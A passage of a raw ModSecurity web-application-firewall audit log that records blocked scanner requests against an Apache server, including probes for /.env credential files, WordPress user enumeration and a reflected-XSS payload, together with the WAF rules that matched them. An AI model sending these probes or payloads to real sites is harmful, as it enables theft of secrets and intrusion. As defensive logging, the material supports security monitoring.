"3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1748757519661850 794 (- - -) Stopwatch2: 1748757519661850 794; combined=322, p1=285, p2=0, p3=0, p4=0, p5=37, sr=76, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --a737a06e-Z-- --fc95eb78-A-- [01/Jun/2025:13:54:25 +0700] aDv5Ie4LjVe0Eerk_ZausgAAAFM 103.236.140.4 51442 103.236.140.4 8181 --fc95eb78-B-- GET /wp-json/wp/v2/users/ HTTP/1.0 Referer: https://smkn22-jkt.sch.id/wp-json/wp/v2/users/ Host: smkn22-jkt.sch.id X-Real-IP: 92.205.64.104 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 92.205.64.104 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36 --fc95eb78-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --fc95eb78-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1748760865423651 3391 (- - -) Stopwatch2: 1748760865423651 3391; combined=1563, p1=536, p2=994, p3=0, p4=0, p5=32, sr=120, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --fc95eb78-Z-- --36c23358-A-- [01/Jun/2025:14:10:07 +0700] aDv8zwQ4kZQGAOBHoB5zeAAAAME 103.236.140.4 51604 103.236.140.4 8181 --36c23358-B-- GET /.env HTTP/1.0 Host: petruk.hauganslekt.no X-Real-IP: 164.92.107.174 X-Forwarded-Host: petruk.hauganslekt.no X-Forwarded-Server: petruk.hauganslekt.no X-Forwarded-For: 164.92.107.174 X-Forwarded-Proto: http Connection: close User-Agent: Go-http-client/1.1 --36c23358-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --36c23358-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1748761807418891 824 (- - -) Stopwatch2: 1748761807418891 824; combined=340, p1=307, p2=0, p3=0, p4=0, p5=32, sr=85, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --36c23358-Z-- --c3d99b41-A-- [01/Jun/2025:14:10:35 +0700] aDv86wQ4kZQGAOBHoB5zfgAAANg 103.236.140.4 51618 103.236.140.4 8181 --c3d99b41-B-- GET /wp-json/wp/v2/users/ HTTP/1.0 Referer: https://smkn22-jkt.sch.id/wp-json/wp/v2/users/ Host: smkn22-jkt.sch.id X-Real-IP: 110.235.250.5 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 110.235.250.5 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36 --c3d99b41-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --c3d99b41-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1748761835178356 3154 (- - -) Stopwatch2: 1748761835178356 3154; combined=1356, p1=463, p2=863, p3=0, p4=0, p5=30, sr=79, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --c3d99b41-Z-- --d4f41252-A-- [01/Jun/2025:14:25:30 +0700] aDwAagQHT18O7PnXxsQySgAAAJU 103.236.140.4 51860 103.236.140.4 8181 --d4f41252-B-- GET /.env HTTP/1.0 Host: mignere.twilightparadox.com X-Real-IP: 206.189.19.19 X-Forwarded-Host: mignere.twilightparadox.com X-Forwarded-Server: mignere.twilightparadox.com X-Forwarded-For: 206.189.19.19 X-Forwarded-Proto: http Connection: close User-Agent: Go-http-client/1.1 --d4f41252-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --d4f41252-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1748762730184960 919 (- - -) Stopwatch2: 1748762730184960 919; combined=358, p1=319, p2=0, p3=0, p4=0, p5=38, sr=103, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --d4f41252-Z-- --7325b97b-A-- [01/Jun/2025:14:46:18 +0700] aDwFSgQ4kZQGAOBHoB5zkwAAAMQ 103.236.140.4 51990 103.236.140.4 8181 --7325b97b-B-- GET /.env HTTP/1.0 Host: bolang.twilightparadox.com X-Real-IP: 206.81.12.187 X-Forwarded-Host: bolang.twilightparadox.com X-Forwarded-Server: bolang.twilightparadox.com X-Forwarded-For: 206.81.12.187 X-Forwarded-Proto: http Connection: close User-Agent: Go-http-client/1.1 --7325b97b-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --7325b97b-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. 
[file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1748763978294845 791 (- - -) Stopwatch2: 1748763978294845 791; combined=302, p1=270, p2=0, p3=0, p4=0, p5=32, sr=75, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --7325b97b-Z-- --dae30511-A-- [01/Jun/2025:15:01:16 +0700] aDwIzAQ4kZQGAOBHoB5zmgAAAMA 103.236.140.4 52088 103.236.140.4 8181 --dae30511-B-- GET /wp-json/wp/v2/users/ HTTP/1.0 Referer: https://smkn22-jkt.sch.id/wp-json/wp/v2/users/ Host: smkn22-jkt.sch.id X-Real-IP: 187.49.156.149 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 187.49.156.149 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36 --dae30511-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --dae30511-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. 
[file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1748764876481644 3345 (- - -) Stopwatch2: 1748764876481644 3345; combined=1385, p1=461, p2=895, p3=0, p4=0, p5=29, sr=82, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --dae30511-Z-- --2a91d928-A-- [01/Jun/2025:15:06:10 +0700] aDwJ8gQ4kZQGAOBHoB5zoQAAAMs 103.236.140.4 52142 103.236.140.4 8181 --2a91d928-B-- GET /wp-json/wp/v2/users/ HTTP/1.0 Referer: https://smkn22-jkt.sch.id/wp-json/wp/v2/users/ Host: smkn22-jkt.sch.id X-Real-IP: 36.37.243.64 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 36.37.243.64 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36 --2a91d928-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --2a91d928-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. 
[file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1748765170645631 3513 (- - -) Stopwatch2: 1748765170645631 3513; combined=1556, p1=592, p2=919, p3=0, p4=0, p5=45, sr=181, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --2a91d928-Z-- --7a7afe23-A-- [01/Jun/2025:15:06:43 +0700] aDwKEwQ4kZQGAOBHoB5zowAAANU 103.236.140.4 52146 103.236.140.4 8181 --7a7afe23-B-- GET /wp-json/wp/v2/users/ HTTP/1.0 Referer: https://smkn22-jkt.sch.id/wp-json/wp/v2/users/ Host: smkn22-jkt.sch.id X-Real-IP: 121.101.134.115 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 121.101.134.115 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36 --7a7afe23-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --7a7afe23-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. 
[file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1748765203515255 3148 (- - -) Stopwatch2: 1748765203515255 3148; combined=1355, p1=461, p2=863, p3=0, p4=0, p5=31, sr=79, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --7a7afe23-Z-- --cf33b54a-A-- [01/Jun/2025:15:12:37 +0700] aDwLdUaTRmdfB-FaJjngzQAAAAM 103.236.140.4 52164 103.236.140.4 8181 --cf33b54a-B-- GET /.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 167.71.33.210 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 167.71.33.210 X-Forwarded-Proto: http Connection: close User-Agent: Mozilla/5.0; Keydrop.io/1.0(onlyscans.com/about); Accept: */* --cf33b54a-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --cf33b54a-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1748765557922698 867 (- - -) Stopwatch2: 1748765557922698 867; combined=387, p1=285, p2=0, p3=0, p4=0, p5=102, sr=78, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --cf33b54a-Z-- --204b9a67-A-- [01/Jun/2025:15:12:56 +0700] aDwLiAQ4kZQGAOBHoB5zpwAAANE 103.236.140.4 52168 103.236.140.4 8181 --204b9a67-B-- GET /wp-json/wp/v2/users/ HTTP/1.0 Referer: https://smkn22-jkt.sch.id/wp-json/wp/v2/users/ Host: smkn22-jkt.sch.id X-Real-IP: 102.164.30.60 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 102.164.30.60 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36 --204b9a67-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --204b9a67-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1748765576381857 3388 (- - -) Stopwatch2: 1748765576381857 3388; combined=1434, p1=495, p2=910, p3=0, p4=0, p5=29, sr=81, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --204b9a67-Z-- --6a8a5827-A-- [01/Jun/2025:15:25:14 +0700] aDwOagQ4kZQGAOBHoB50IwAAANY 103.236.140.4 52632 103.236.140.4 8181 --6a8a5827-B-- GET /.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 185.177.72.2 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 185.177.72.2 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:105.0) Gecko/20100101 Firefox/105.0 Accept: */* --6a8a5827-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --6a8a5827-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1748766314029088 818 (- - -) Stopwatch2: 1748766314029088 818; combined=353, p1=316, p2=0, p3=0, p4=0, p5=37, sr=86, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --6a8a5827-Z-- --770f3471-A-- [01/Jun/2025:15:25:15 +0700] aDwOawQ4kZQGAOBHoB50JAAAANc 103.236.140.4 52634 103.236.140.4 8181 --770f3471-B-- POST /.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 185.177.72.2 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 185.177.72.2 X-Forwarded-Proto: https Connection: close Content-Length: 13 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:106.0) Gecko/20100101 Firefox/106.0 Accept: */* Content-Type: application/x-www-form-urlencoded --770f3471-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --770f3471-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1748766315463918 668 (- - -) Stopwatch2: 1748766315463918 668; combined=254, p1=222, p2=0, p3=0, p4=0, p5=32, sr=65, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --770f3471-Z-- --a14e355b-A-- [01/Jun/2025:15:25:16 +0700] aDwObO4LjVe0Eerk_Zau5wAAAFA 103.236.140.4 52640 103.236.140.4 8181 --a14e355b-B-- GET /.env.prod HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 185.177.72.2 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 185.177.72.2 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:106.0) Gecko/20100101 Firefox/106.0 Accept: */* --a14e355b-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --a14e355b-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1748766316665183 663 (- - -) Stopwatch2: 1748766316665183 663; combined=261, p1=230, p2=0, p3=0, p4=0, p5=31, sr=57, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --a14e355b-Z-- --366bff16-A-- [01/Jun/2025:15:25:18 +0700] aDwObgQHT18O7PnXxsQyagAAAIk 103.236.140.4 52644 103.236.140.4 8181 --366bff16-B-- POST /.env.prod HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 185.177.72.2 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 185.177.72.2 X-Forwarded-Proto: https Connection: close Content-Length: 13 User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/106.0.0.0 Safari/537.36 Accept: */* Content-Type: application/x-www-form-urlencoded --366bff16-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --366bff16-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1748766318187995 803 (- - -) Stopwatch2: 1748766318187995 803; combined=341, p1=300, p2=0, p3=0, p4=0, p5=41, sr=97, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --366bff16-Z-- --62566d51-A-- [01/Jun/2025:15:25:19 +0700] aDwObwQ4kZQGAOBHoB50KQAAAMI 103.236.140.4 52648 103.236.140.4 8181 --62566d51-B-- GET /.env.production HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 185.177.72.2 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 185.177.72.2 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0 Accept: */* --62566d51-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --62566d51-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1748766319649074 793 (- - -) Stopwatch2: 1748766319649074 793; combined=340, p1=301, p2=0, p3=0, p4=0, p5=39, sr=75, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --62566d51-Z-- --f1539779-A-- [01/Jun/2025:15:25:21 +0700] aDwOce4LjVe0Eerk_Zau6AAAAFI 103.236.140.4 52654 103.236.140.4 8181 --f1539779-B-- POST /.env.production HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 185.177.72.2 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 185.177.72.2 X-Forwarded-Proto: https Connection: close Content-Length: 13 User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:105.0) Gecko/20100101 Firefox/105.0 Accept: */* Content-Type: application/x-www-form-urlencoded --f1539779-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --f1539779-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1748766321109079 842 (- - -) Stopwatch2: 1748766321109079 842; combined=362, p1=325, p2=0, p3=0, p4=0, p5=37, sr=78, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --f1539779-Z-- --0f7ba729-A-- [01/Jun/2025:15:27:52 +0700] aDwPCO4LjVe0Eerk_Zau6QAAAFU 103.236.140.4 52740 103.236.140.4 8181 --0f7ba729-B-- GET /.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 196.251.85.66 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 196.251.85.66 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (compatible; archive.org_bot; Wayback Machine Live Record; +http://archive.org/details/archive.org_bot) Accept-Charset: utf-8 --0f7ba729-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --0f7ba729-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1748766472553528 878 (- - -) Stopwatch2: 1748766472553528 878; combined=380, p1=342, p2=0, p3=0, p4=0, p5=38, sr=118, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --0f7ba729-Z-- --c3d1a752-A-- [01/Jun/2025:15:42:47 +0700] aDwShwQHT18O7PnXxsQyewAAAJM 103.236.140.4 52862 103.236.140.4 8181 --c3d1a752-B-- GET /wp-content/plugins/wp-planet/rss.class/scripts/magpie_debug.php?url=%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E HTTP/1.0 Host: up.smkn22jakarta.sch.id X-Real-IP: 198.252.110.114 X-Forwarded-Host: up.smkn22jakarta.sch.id X-Forwarded-Server: up.smkn22jakarta.sch.id X-Forwarded-For: 198.252.110.114 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Safari/104.0 Safari/537.36 --c3d1a752-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --c3d1a752-E-- --c3d1a752-H-- Message: Access denied with code 403 (phase 2). Pattern match "alert(document.domain)"] [severity "CRITICAL"] [tag "CWAF"] [tag "XSS"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1748767367454591 2043 (- - -) Stopwatch2: 1748767367454591 2043; combined=1013, p1=353, p2=633, p3=0, p4=0, p5=27, sr=67, sw=0, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --c3d1a752-Z-- --46160549-A-- [01/Jun/2025:16:03:52 +0700] aDwXeO4LjVe0Eerk_ZavDgAAAFQ 103.236.140.4 53218 103.236.140.4 8181 --46160549-B-- GET /wp-json/wp/v2/users/ HTTP/1.0 Referer: https://smkn22-jkt.sch.id/wp-json/wp/v2/users/ Host: smkn22-jkt.sch.id X-Real-IP: 37.130.40.36 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 37.130.40.36 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36 --46160549-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --46160549-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at 